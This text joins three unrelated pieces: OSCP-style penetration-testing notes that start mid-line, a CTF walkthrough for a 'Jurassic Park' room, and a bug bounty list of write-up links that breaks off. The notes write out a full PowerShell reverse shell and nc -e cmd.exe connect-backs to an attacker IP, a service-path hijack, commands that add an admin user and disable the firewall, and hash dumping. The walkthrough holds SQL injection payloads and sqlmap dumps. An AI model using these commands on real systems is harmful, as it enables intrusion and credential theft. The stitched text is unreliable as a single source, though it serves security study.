https://github.com/rebootuser/LinEnum.git git clone --depth 1 https://github.com/mzet-/linux-exploit-suggester.git git clone --depth 1 https://github.com/TH3xACE/SUDO_KILLER.git git clone --depth 1 https://github.com/M4ximuss/Powerless.git git clone --depth 1 https://github.com/411Hall/JAWS.git git clone --depth 1 https://github.com/PowerShellMafia/PowerSploit.git git clone --depth 1 https://github.com/absolomb/WindowsEnum.git git clone --depth 1 https://github.com/rasta-mouse/Sherlock.git git clone --depth 1 https://github.com/ankh2054/windows-pentest.git git clone --depth 1 https://github.com/SecWiki/windows-kernel-exploits.git git clone --depth 1 https://github.com/51x/WHP.git git clone --depth 1 https://github.com/AusJock/Privilege-Escalation.git git clone --depth 1 https://github.com/3ndG4me/AutoBlue-MS17-010.git git clone --depth 1 https://github.com/GDSSecurity/Windows-Exploit-Suggester.git ``` # Starting a pentest Beginning a pentest against a host? Start with the following commands: ``` nmap -A -sV --script=default,vuln,smb-vuln* -p- --open -oA tcp_10.11.1.x 10.11.1.x nmap -A -sV -sU --script=default,vuln --open -oA udp_10.11.1.x 10.11.1.x echo "10.11.1.x" > 10.11.1.x_target.txt && ~/Desktop/tools/onetwopunch.sh -i tap0 -t 10.11.1.x_target.txt python3 ~/Desktop/tools/AutoRecon/autorecon.py "10.11.1.x" -v -o ~/Desktop/oscp ``` Searchsploit can run with nmap output: `searchsploit --nmap tcp_10.11.1.x.xml` Ideally, your goal is to enumerate your _attack surface_ in as much detail as possible: all exposed services, with full details (version, modules, and configuration) Don't forget to try default creds. Not all scripts have useful console output. Wireshark may be useful for manually reviewing if auth is successful. See https://guide.offsecnewbie.com/general-methodology # Protocol specific notes ## FTP * Scan for anonymous access * Filezilla fails to connect if the directory listing isn't allowed. * Always use binary mode when transferring files * FTP command line reference: ``` Connect: ftp <ip> Binary mode: binary List files: ls Change dir: cd Download file: get <file> Upload file: put <file> ``` ## HTTP HTTP consists of several components: * Web server * Programming language (if any) * Back-end platform/framework (Drupal, Wordpress, etc.) and plugins * Front-end UI Other notes: * Each component has its own vulnerabilities. Front-end vulns are useful for XSS and the like. * A web server listens on one or more ports. It can also run multiple languages and multiple frameworks at different paths. ### Web Servers: * Apache, nginx, and Microsoft IIS are most common. * Less-common webservers are more likely to have vulnerabilities and misconfigurations ### Web scanners: * nikto to scan for vulns: `nikto -h [IP] -p [PORT] -o "[OUTPUT].txt"` * whatweb to detect versions: `whatweb --aggression 2 www.example.com` * gobuster to enumerate directories. `gobuster -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.11.1.x:80` * If you know you can create files on a web server, but aren't sure where they are, bruteforcing is acceptable * Recommended wordlists: `/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt` and `/usr/share/seclists/Discovery/Web-Content/common.txt` ### Coldfusion Colfusion guide: https://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers ### Wordpress wpscan --url www.example.com ## LDAP * nmap -p 389 --script ldap-rootdse -Pn 1.2.3.4 * nmap -p 389 --script ldap-search -Pn 1.2.3.4 * ldapsearch -x -h 1.2.3.4 -s base namingcontexts * ldapsearch -x -h 1.2.3.4 -b "dc=lightweight,dc=htb" ## SMB For Linux targets running SMB, it may be possible to find a version number in the raw network traffic with Wireshark in the `smb.native_lanman` field. # Lessons Learned ## Exploitation If an exploit looks like it should be succesful, but is failing to connect back with a reverse shell, try cycling through common ports: 80, 443, 8080, 53 Try using other payloads besides reverse shell, if the exploit works. Adding an admin/root user and connecting via SSH/RDP is an alternative to an immediate root shell. * Reverse shell one-liners: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet # General Privilege escalation ## Concepts: * https://github.com/sagishahar/lpeworkshop ## Ports for reverse shell Trying to figure out if a port is available for further connect-back? Try nmap + wireshark On compromised host, run: `nmap -sV -P0 -p- 10.11.0.57` On attacker system, use the following wireshark filter: `ip.src == 10.11.1.252 && tcp.flags.syn == 1 && tcp.flags.ack == 0` ## Lazy credentials If you see lazy passwords in one place of admin/admin, expect that there might be lazy passwords in other places too. # Windows Privilege escalation * `accesschk.exe /accepteula -c *` for seeing services with RW access, so the service image path itself can be changed. * https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ * Sometimes files may be hidden. Use `dir /A` instead of dir. * https://guif.re/windowseop * Show user information: `net user username` * Show information on group: `net localgroup administrators` * May have stored credentials: `cmdkey /list` * Escalate with: `runas /user:ACCESS\Administrator /savecred "command"` * Windows reverse shell: `$client = New-Object System.Net.Sockets.TCPClient("10.10.12.84",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()` ## Run/Transfer/Exfil files with SMB: SMB server on Kali box is easiest way to run/transfer/exfil files. * Start SMB server: `python /usr/share/doc/python-impacket/examples/smbserver.py -smb2support share /www` * Note: Some Windows hosts are locked down and only allow SMB2 * Copy file: `COPY \\10.10.12.84\share\PowerUp.ps1 PowerUp.ps1` * Run command: `\\10.10.12.84\share\nc.exe -nv -e cmd.exe 10.10.12.84 80` ## Second shell After getting a shell, get a second shell with "start" in case the first one bugs up/hangs/crashes (assuming running SMB server): victim > `start \\10.10.12.84\share\nc.exe -nv -e cmd.exe 10.10.12.84 80` ## XP SP1 (and earlier) privesc via upnphost: ``` sc config upnphost binpath= "C:\Inetpub\nc.exe -nv 10.11.0.X 5555 -e C:\Windows\system32\cmd.exe" sc config upnphost obj= ".\LocalSystem" password= "" sc config upnphost depend= "" sc qc upnphost ``` ## Windows privesc enumeration scripts * `powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt` * https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc and download PowerUp.ps1 * `powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"` ## Windows commands to run as root: * Add new admin: `net user hacker Winter2019! /add && net localgroup administrators hacker /add && net group administrators hacker /add` * Disable windows firewall: `NetSh Advfirewall set allprofiles state off` ## Windows Privesc online resources * https://www.roguesecurity.in/2018/12/02/a-guide-for-windows-penetration-testing/ * https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ * Exploits: http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation * http://www.fuzzysecurity.com/tutorials/16.html * https://toshellandback.com/2015/11/24/ms-priv-esc/ # Linux Privilege escalation ## Concepts * https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ * Local Linux Enumeration & Privilege Escalation Cheatsheet (by author of LinEnum) - https://www.rebootuser.com/?p=1623 * `sudo -l` abuse: https://bitvijays.github.io/LFC-VulnerableMachines.html#sudo-l-permissions ## Scripts * `LinEnum.sh -t -s` ## General Guidance * Compiling exploits: `gcc -o sploit 9545.c -Wl,--hash-style=both` * Recommended Kernel Exploits: * FreeBSD 9.0: https://www.exploit-db.com/exploits/28718 * Ubuntu 16.04: https://www.exploit-db.com/exploits/39772 * Linux 2.6.9-89.EL: https://www.exploit-db.com/exploits/9545 * Linux beta 3.0.0-12-generic: https://gist.github.com/karthick18/1686299 * Linux Kernel 2.6.39 to 3.2.2 (x86/x64) - 'Mempodipper' - https://www.exploit-db.com/exploits/35161 * Linux core 2.6.32-21: https://www.exploit-db.com/exploits/14814/ * Diverse unix: https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/blob/master/2009/CVE-2009-2692/2.6.18.c & https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack * Diverse Windows: https://github.com/jivoi/pentest/blob/master/exploit_win/win_local_exploits.md * Exploiting services running as root that shouldn't be: * MySQL: https://www.exploit-db.com/exploits/1518 # Post-rooting activities * Dump and crack hashes * Linux: * Dump: `cat /etc/shadow` or `cat /etc/shadow` * Crack: * Windows: * Dump hashes #1: `wce32.exe -w` or `wce64.exe -w` * Dump hashes #2: `fgdump.exe && type *.pwdump` * Crack with: https://hashkiller.co.uk/Cracker/NTLM * Or: `john ./hashes.txt --format=nt --wordlist=/usr/share/wordlists/rockyou.txt` * Or: `hashcat -m 1000 hash.pwd /usr/share/wordlists/rockyou.txt --force` * Look for interesting files only accessible to root/admin * Sensitive files in Desktop or Documents * Backup files * Sensitive data in Windows Registry # Transferring files: * Python HTTP Server: `python -m SimpleHTTPServer <port>` * Python SMB Server: `python /usr/share/doc/python-impacket/examples/smbserver.py share /www` * wget in VBS: https://github.com/pythonmaster41/Go-For-OSCP/blob/master/Useful_Scripts/FILE_TRANSFER_Script/2.VBS/transfer-command.txt # Writing Exploits: * https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/ * When in doubt, it may be wise to assume common badchars (`\x00`, `CR`, `LF`, ` `) * Online assembler: https://defuse.ca/online-x86-assembler.htm # Online Resources * https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html - Amazing resource on methodology * https://github.com/DigitalAftermath/EnumerationVisualized/wiki * https://forums.offensive-security.com/showthread.php?4689-Offensive-Security-s-Complete-Guide-to-Alpha * https://www.roguesecurity.in/2018/12/02/a-guide-for-windows-penetration-testing/ * https://sushant747.gitbooks.io/total-oscp-guide/ * https://blog.ropnop.com/transferring-files-from-kali-to-windows/ - File Transfer techniques * http://www.fuzzysecurity.com/tutorials/16.html * https://guif.re * https://jhalon.github.io/OSCP-Review/ * https://scriptdotsh.com/index.php/2018/04/17/31-days-of-oscp-experience/ * https://411hall.github.io/JAWS-Enumeration/ * https://www.securitysift.com/offsec-pwb-oscp/ * https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97 * https://www.reddit.com/r/oscp/comments/a9e2yv/from_0_to_oscp_in_90days/
# Jurassic Park - What is the SQL database called which is serving the shop information? - `scilla port -target <TARGET_IP>` - Visit `http://<TARGET_IP>` - Interesting content here: `http://<TARGET_IP>/item.php?id=5` - `scilla dir -target <TARGET_IP>` - `/assets` accessible, but nothing interesting. - `http://<TARGET_IP>/item.php?id=%27%20OR%201=1%20--%20-` - WOOHOO. - `sqlmap -u "http://<TARGET_IP>/item.php?id=1" --dump` - `****` - How many columns does the table have? - also with: `http://<TARGET_IP>/item.php?id=5%20union%20select%201,2,3,4,5` - `5` - Whats the system version? - `ubuntu **.**` - What is dennis' password? - `********` - Locate and get the first flag contents. - `ssh dennis@<TARGET_IP>`, `yes` and enter the password. - `cat flag1.txt` - `**************************` - Whats the contents of the second flag? - `cat .*` - `cat /boot/grub/fonts/flagTwo.txt` - `****************************` - Whats the contents of the third flag? - `cat /home/dennis/.bash_history` - `****************************` - There is no fourth flag. no answer needed - Whats the contents of the fifth flag? - `wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh` - `sudo python3 -m http.server` - `wget http://<YOUR_IP>:8000/LinEnum.sh` - `chmod +x LinEnum.sh` - `./LinEnum.sh` - `sudo -l` - scp withou password. - https://gtfobins.github.io/gtfobins/scp/#sudo - `cat /root/root.txt` - `*************************`
# Bug Bounty Reference A list of bug bounty write-up that is categorized by the bug nature, this is inspired by https://github.com/djadmin/awesome-bug-bounty # Introduction I have been reading for Bug Bounty write-ups for a few months, I found it extremely useful to read relevant write-up when I found a certain type of vulnerability tha I have no idea how to exploit. Let say you found a RPO (Relativce Path Overwrite) in a website, but you have no idea how should you exploit that, then the perfect place to go would be [here](http://blog.innerht.ml/rpo-gadgets/). Or you have found your customer is using oauth mechanism but you have no idea how should we test it, the other perfect place to go would be [here](https://whitton.io/articles/obtaining-tokens-outlook-office-azure-account/) My intention is to make a full and complete list of common vulnerability that are publicly disclosed bug bounty write-up, and let Bug Bounty Hunter to use this page as a reference when they want to gain some insight for a particular kind of vulnerability during Bug Hunting, feel free to submit pull request. Okay, enough for chit-chatting, let's get started. - [XSSI](#xssi) - [Cross-Site Scripting (XSS)](#cross-site-scripting-xss) - [Brute Force](#brute-force) - [SQL Injection (SQLi)](#sql-injection) - [External XML Entity Attack (XXE)](#xxe) - [Remote Code Execution (RCE)](#remote-code-execution) - [Deserialization](#deserialization) - [Image Tragick](#image-tragick) - [Cross-Site Request Forgery (CSRF)](#csrf) - [Insecure Direct Object Reference (IDOR)](#insecure-direct-object-reference-idor) - [Stealing Access Token](#stealing-access-token) - [Google Oauth Login Bypass](#google-oauth-bypass) - [Server Side Request Forgery (SSRF)](#server-side-request-forgery-ssrf) - [Unrestricted File Upload](#unrestricted-file-upload) - [Race Condition](#race-condition) - [Business Logic Flaw](#business-logic-flaw) - [Authentication Bypass](#authentication-bypass) - [HTTP Header Injection](#http-header-injection) - [Email Related](#email-related) - [Money Stealing](#money-stealing) - [Miscellaneous](#miscellaneous) ### Cross-Site Scripting (XSS) - [Sleeping stored Google XSS Awakens a $5000 Bounty](https://blog.it-securityguard.com/bugbounty-sleeping-stored-google-xss-awakens-a-5000-bounty/) by Patrik Fehrenbach - [RPO that lead to information leakage in Google](http://blog.innerht.ml/rpo-gadgets/) by filedescriptor - [God-like XSS, Log-in, Log-out, Log-in](https://whitton.io/articles/uber-turning-self-xss-into-good-xss/) in Uber by Jack Whitton - [Three Stored XSS in Facebook](http://www.breaksec.com/?p=6129) by Nirgoldshlager - [Using a Braun Shaver to Bypass XSS Audit and WAF](https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify) by Frans Rosen - [An XSS on Facebook via PNGs & Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/) by Jack Whitton - he is able to make stored XSS from a irrelevant domain to main facebook domain - [Stored XSS in *.ebay.com](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/) by Jack Whitton - [Complicated, Best Report of Google XSS](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss) by Ramzes - [Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com](https://hackerone.com/reports/150179) by secgeek - [Command Injection in Google Console](http://www.pranav-venkat.com/2016/03/command-injection-which-got-me-6000.html) by Venkat S - [Facebook's Moves - OAuth XSS](http://www.paulosyibelo.com/2015/12/facebooks-moves-oauth-xss.html) by PAULOS YIBELO - [Stored XSS in Google Docs (Bug Bounty)](http://hmgmakarovich.blogspot.hk/2015/11/stored-xss-in-google-docs-bug-bounty.html) by Harry M Gertos - [Stored XSS on developer.uber.com via admin account compromise in Uber](https://hackerone.com/reports/152067) by James Kettle (albinowax) - [Yahoo Mail stored XSS](https://klikki.fi/adv/yahoo.html) by Klikki Oy - [Abusing XSS Filter: One ^ leads to XSS(CVE-2016-3212)](http://mksben.l0.cm/2016/07/xxn-caret.html) by Masato Kinugawa - [Youtube XSS](https://labs.detectify.com/2015/06/06/google-xss-turkey/) by fransrosen - [Best Google XSS again](https://sites.google.com/site/bughunteruniversity/best-reports/openredirectsthatmatter) - by Krzysztof Kotowicz - [IE & Edge URL parsin Problem](https://labs.detectify.com/2016/10/24/combining-host-header-injection-and-lax-host-parsing-serving-malicious-data/) - by detectify - [Google XSS subdomain Clickjacking](http://sasi2103.blogspot.sg/2016/09/combination-of-techniques-lead-to-dom.html) - [Microsoft XSS and Twitter XSS](http://blog.wesecureapp.com/xss-by-tossing-cookies/) - [Google Japan Book XSS](http://nootropic.me/blog/en/blog/2016/09/20/%E3%82%84%E3%81%AF%E3%82%8A%E3%83%8D%E3%83%83%E3%83%88%E3%82%B5%E3%83%BC%E3%83%95%E3%82%A3%E3%83%B3%E3%82%92%E3%81%97%E3%81%A6%E3%81%84%E3%81%9F%E3%82%89%E3%81%9F%E3%81%BE%E3%81%9F%E3%81%BEgoogle/) - [Flash XSS mega nz](https://labs.detectify.com/2013/02/14/how-i-got-the-bug-bounty-for-mega-co-nz-xss/) - by frans - [Flash XSS in multiple libraries](https://olivierbeg.com/finding-xss-vulnerabilities-in-flash-files/) - by Olivier Beg - [xss in google IE, Host Header Reflection](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html) - [Years ago Google xss](http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf) - [xss in google by IE weird behavior](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html) - [xss in Yahoo Fantasy Sport](https://web.archive.org/web/20161228182923/http://dawgyg.com/2016/12/07/stored-xss-affecting-all-fantasy-sports-fantasysports-yahoo-com-2/) - [xss in Yahoo Mail Again, worth $10000](https://klikki.fi/adv/yahoo2.html) by Klikki Oy - [Sleeping XSS in Google](https://blog.it-securityguard.com/bugbounty-sleeping-stored-google-xss-awakens-a-5000-bounty/) by securityguard - [Decoding a .htpasswd to earn a payload of money](https://blog.it-securityguard.com/bugbounty-decoding-a-%F0%9F%98%B1-00000-htpasswd-bounty/) by securityguard - [Google Account Takeover](http://www.orenh.com/2013/11/google-account-recovery-vulnerability.html#comment-form) - [AirBnb Bug Bounty: Turning Self-XSS into Good-XSS #2](http://www.geekboy.ninja/blog/airbnb-bug-bounty-turning-self-xss-into-good-xss-2/) by geekboy - [Uber Self XSS to Global XSS](https://httpsonly.blogspot.hk/2016/08/turning-self-xss-into-good-xss-v2.html) - [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf)](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.cktt61q9g) by Marin MoulinierFollow - [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) by Brett - [XSSI, Client Side Brute Force](http://blog.intothesymmetry.com/2017/05/cross-origin-brute-forcing-of-saml-and.html) - [postMessage XSS Bypass](https://hackerone.com/reports/231053) - [XSS in Uber via Cookie](http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/) by zhchbin - [Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP](https://hackerone.com/reports/207042) by frans - [XSS due to improper regex in third party js Uber 7k XSS](http://zhchbin.github.io/2016/09/10/A-Valuable-XSS/) - [XSS in TinyMCE 2.4.0](https://hackerone.com/reports/262230) by Jelmer de Hen - [Pass uncoded URL in IE11 to cause XSS](https://hackerone.com/reports/150179) - [Twitter XSS by stopping redirection and javascript scheme](http://blog.blackfan.ru/2017/09/devtwittercom-xss.html) by Sergey Bobrov - [Auth DOM Uber XSS](http://stamone-bug-bounty.blogspot.hk/2017/10/dom-xss-auth_14.html) - [Managed Apps and Music: two Google reflected XSSes](https://ysx.me.uk/managed-apps-and-music-a-tale-of-two-xsses-in-google-play/) - [App Maker and Colaboratory: two Google stored XSSes](https://ysx.me.uk/app-maker-and-colaboratory-a-stored-google-xss-double-bill/) - [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be) - [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html) - [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) ### Brute Force - [Web Authentication Endpoint Credentials Brute-Force Vulnerability](https://hackerone.com/reports/127844) by Arne Swinnen - [InstaBrute: Two Ways to Brute-force Instagram Account Credentials](https://www.arneswinnen.net/2016/05/instabrute-two-ways-to-brute-force-instagram-account-credentials/) by Arne Swinnen - [How I Could Compromise 4% (Locked) Instagram Accounts](https://www.arneswinnen.net/2016/03/how-i-could-compromise-4-locked-instagram-accounts/) by Arne Swinnen - [Possibility to brute force invite codes in riders.uber.com](https://hackerone.com/reports/125505) by r0t - [Brute-Forcing invite codes in partners.uber.com](https://hackerone.com/reports/144616) by Efkan Gökbaş (mefkan) - [How I could have hacked all Facebook accounts](http://www.anandpraka.sh/2016/03/how-i-could-have-hacked-your-facebook.html) by Anand Prakash - [Facebook Account Take Over by using SMS verification code, not accessible by now, may get update from author later](http://arunsureshkumar.me/index.php/2016/04/24/facebook-account-take-over/) by Arun Sureshkumar ### SQL Injection - [SQL injection in Wordpress Plugin Huge IT Video Gallery in Uber](https://hackerone.com/reports/125932) by glc - [SQL Injection on sctrack.email.uber.com.cn](https://hackerone.com/reports/150156) by Orange Tsai - [Yahoo – Root Access SQL Injection – tw.yahoo.com](http://buer.haus/2015/01/15/yahoo-root-access-sql-injection-tw-yahoo-com/) by Brett Buerhaus - [Multiple vulnerabilities in a WordPress plugin at drive.uber.com](https://hackerone.com/reports/135288) by Abood Nour (syndr0me) - [GitHub Enterprise SQL Injection](http://blog.orange.tw/2017/01/bug-bounty-github-enterprise-sql-injection.html) by Orange - [Yahoo SQL Injection to Remote Code Exection to Root Privilege](http://www.sec-down.com/wordpress/?p=494) by Ebrahim Hegazy ### Stealing Access Token - [Facebook Access Token Stolen](https://whitton.io/articles/stealing-facebook-access-tokens-with-a-double-submit/) by Jack Whitton - - [Obtaining Login Tokens for an Outlook, Office or Azure Account](https://whitton.io/articles/obtaining-tokens-outlook-office-azure-account/) by Jack Whitton - [Bypassing Digits web authentication's host validation with HPP](https://hackerone.com/reports/114169) by filedescriptor - [Bypass of redirect_uri validation with /../ in GitHub](http://homakov.blogspot.hk/2014/02/how-i-hacked-github-again.html?m=1) by Egor Homakov - [Bypassing callback_url validation on Digits](https://hackerone.com/reports/108113) by filedescriptor - [Stealing livechat token and using it to chat as the user - user information disclosure](https://hackerone.com/reports/151058) by Mahmoud G. (zombiehelp54) - [Change any Uber user's password through /rt/users/passwordless-signup - Account Takeover (critical)](https://hackerone.com/reports/143717) by mongo (mongo) - [Internet Explorer has a URL problem, on GitHub](http://blog.innerht.ml/internet-explorer-has-a-url-problem/) by filedescriptor. - [How I made LastPass give me all your passwords](https://labs.detectify.com/2016/07/27/how-i-made-lastpass-give-me-all-your-passwords/) by labsdetectify - [Steal Google Oauth in Microsoft](http://blog.intothesymmetry.com/2015/06/on-oauth-token-hijacks-for-fun-and.html) - [Steal FB Access Token](http://blog.intothesymmetry.com/2014/04/oauth-2-how-i-have-hacked-facebook.html) - [Paypal Access Token Leaked](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html?m=1) - [Steal FB Access Token](http://homakov.blogspot.sg/2013/02/hacking-facebook-with-oauth2-and-chrome.html) - [Appengine Cool Bug](https://proximasec.blogspot.hk/2017/02/a-tale-about-appengines-authentication.html) - [Slack post message real life experience](https://labs.detectify.com/2017/02/28/hacking-slack-using-postmessage-and-websocket-reconnect-to-steal-your-precious-token/) - [Bypass redirect_uri](http://nbsriharsha.blogspot.in/2016/04/oauth-20-redirection-bypass-cheat-sheet.html) by nbsriharsha - [Stealing Facebook Messenger nonce worth 15k](https://stephensclafani.com/2017/03/21/stealing-messenger-com-login-nonces/) - [Steal Oculus Nonce and Oauth Flow Bypass](https://medium.com/@lokeshdlk77/bypass-oauth-nonce-and-steal-oculus-response-code-faa9cc8d0d37) #### Google oauth bypass - [Bypassing Google Authentication on Periscope's Administration Panel](https://whitton.io/articles/bypassing-google-authentication-on-periscopes-admin-panel/) By Jack Whitton ### CSRF - [Messenger.com CSRF that show you the steps when you check for CSRF](https://whitton.io/articles/messenger-site-wide-csrf/) by Jack Whitton - [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack)](https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/) by Florian Courtial - [Hacking PayPal Accounts with one click (Patched)](http://yasserali.com/hacking-paypal-accounts-with-one-click/) by Yasser Ali - [Add tweet to collection CSRF](https://hackerone.com/reports/100820) by vijay kumar - [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/) by phwd - [How i Hacked your Beats account ? Apple Bug Bounty](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/) by @aaditya_purani - [FORM POST JSON: JSON CSRF on POST Heartbeats API](https://hackerone.com/reports/245346) by Dr.Jones - [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf) ### Remote Code Execution - [JDWP Remote Code Execution in PayPal](https://www.vulnerability-lab.com/get_content.php?id=1474) by Milan A Solanki - [XXE in OpenID: one bug to rule them all, or how I found a Remote Code Execution flaw affecting Facebook's servers](http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution) by Reginaldo Silva - [How I Hacked Facebook, and Found Someone's Backdoor Script](http://devco.re/blog/2016/04/21/how-I-hacked-facebook-and-found-someones-backdoor-script-eng-ver/) by Orange Tsai - [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html) by Orange Tsai - [uber.com may RCE by Flask Jinja2 Template Injection](https://hackerone.com/reports/125980) by Orange Tsai - [Yahoo Bug Bounty - *.login.yahoo.com Remote Code Execution](http://blog.orange.tw/2013/11/yahoo-bug-bounty-part-2-loginyahoocom.html) by Orange Tsai (Sorry its in Chinese Only) - [How we broke PHP, hacked Pornhub and earned $20,000](https://www.evonide.com/how-we-broke-php-hacked-pornhub-and-earned-20000-dollar/) by Ruslan Habalov - *Alert*, God-like Write-up, make sure you know what is ROP before clicking, which I don't =( - [RCE deal to tricky file upload](https://www.secgeek.net/bookfresh-vulnerability/) by secgeek - [WordPress SOME bug in plupload.flash.swf leading to RCE in Automatic](https://hackerone.com/reports/134738) by Cure53 (cure53) - [Read-Only user can execute arbitraty shell commands on AirOS](https://hackerone.com/reports/128750) by 93c08539 (93c08539) - [Remote Code Execution by impage upload!](https://hackerone.com/reports/158148) by Raz0r (ru_raz0r) - [Popping a shell on the Oculus developer portal](https://bitquark.co.uk/blog/2014/08/31/popping_a_shell_on_the_oculus_developer_portal) by Bitquark - [Crazy! PornHub RCE AGAIN!!! How I hacked Pornhub for fun and profit - 10,000$](https://5haked.blogspot.sg/) by 5haked - [PayPal Node.js code injection (RCE)](http://artsploit.blogspot.hk/2016/08/pprce2.html) by Michael Stepankin - [eBay PHP Parameter Injection lead to RCE](http://secalert.net/#ebay-rce-ccs) - [Yahoo Acqusition RCE](https://seanmelia.files.wordpress.com/2016/02/yahoo-remote-code-execution-cms1.pdf) - [Command Injection Vulnerability in Hostinger](http://elladodelnovato.blogspot.hk/2017/02/command-injection-vulnerability-in.html?spref=tw&m=1) by @alberto__segura - [RCE in Airbnb by Ruby Injection](http://buer.haus/2017/03/13/airbnb-ruby-on-rails-string-interpolation-led-to-remote-code-execution/) by buerRCE - [RCE in Imgur by Command Line](https://hackerone.com/reports/212696) - [RCE in git.imgur.com by abusing out dated software](https://hackerone.com/reports/206227) by Orange Tsai - [RCE in Disclosure](https://hackerone.com/reports/213558) - [Remote Code Execution by struct2 Yahoo Server](https://medium.com/@th3g3nt3l/how-i-got-5500-from-yahoo-for-rce-92fffb7145e6) - [Command Injection in Yahoo Acquisition](http://samcurry.net/how-i-couldve-taken-over-the-production-server-of-a-yahoo-acquisition-through-command-injection/) - [Paypal RCE](http://blog.pentestbegins.com/2017/07/21/hacking-into-paypal-server-remote-code-execution-2017/) - [$50k RCE in JetBrains IDE](http://blog.saynotolinux.com/blog/2016/08/15/jetbrains-ide-remote-code-execution-and-local-file-disclosure-vulnerability-analysis/) - [$20k RCE in Jenkin Instance](http://nahamsec.com/secure-your-jenkins-instance-or-hackers-will-force-you-to/) by @nahamsec - [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/) - [Telekom.de Remote Command Execution!](http://www.sec-down.com/wordpress/?p=581) by Ebrahim Hegazy - [Magento Remote Code Execution Vulnerability!](http://www.sec-down.com/wordpress/?p=578) by Ebrahim Hegazy - [Yahoo! Remote Command Execution Vulnerability](http://www.sec-down.com/wordpress/?p=87) by Ebrahim Hegazy #### Deserialization - [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin - [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg - [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel) - [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals #### Image Tragick - [Exploiting ImageMagick to get RCE on Polyvore (Yahoo Acquisition)](http://nahamsec.com/exploiting-imagemagick-on-yahoo/) by NaHamSec - [Exploting ImageMagick to get RCE on HackerOne](https://hackerone.com/reports/135072) by c666a323be94d57 - [Trello bug bounty: Access server's files using ImageTragick](https://hethical.io/trello-bug-bounty-access-servers-files-using-imagetragick/) by Florian Courtial - [40k fb rce](4lemon.ru/2017-01-17_facebook_imagetragick_remote_code_execution.html) - [Yahoo Bleed 1](https://scarybeastsecurity.blogspot.hk/2017/05/bleed-continues-18-byte-file-14k-bounty.html) - [Yahoo Bleed 2](https://scarybeastsecurity.blogspot.hk/2017/05/bleed-more-powerful-dumping-yahoo.html) ### Direct Object Reference (IDOR) - [Trello bug bounty: The websocket receives data when a public company creates a team visible board](https://hethical.io/trello-bug-bounty-the-websocket-receives-data-when-a-public-company-creates-a-team-visible-board/) by Florian Courtial - [Trello bug bounty: Payments informations are sent 